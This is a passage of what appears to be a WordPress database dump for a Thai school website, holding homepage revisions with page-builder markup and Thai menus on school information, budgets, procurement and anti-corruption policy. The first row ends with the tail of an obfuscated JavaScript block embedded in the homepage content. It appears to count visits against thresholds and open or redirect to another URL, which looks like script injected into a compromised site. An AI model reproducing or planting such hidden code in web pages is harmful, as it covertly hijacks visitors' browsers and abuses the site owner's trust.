_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-07-27 21:03:13','2024-07-27 14:03:13','',19,'http://watprato.ssk.in.th/?p=53',0,'revision','',0),
(54,1,'2024-07-27 21:03:47','2024-07-27 14:03:47','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_93202e-5b\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_e4ac7a-c6\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_e4ac7a-c6\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"bcb37a0b\",\"mediaId\":40,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bcb37a0b\"><img class=\"gb-image gb-image-bcb37a0b\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/434878811_122134783502202781_1764078122862278595_n.jpg\" alt=\"\" title=\"434878811_122134783502202781_1764078122862278595_n\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_fdcfc1-e7\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 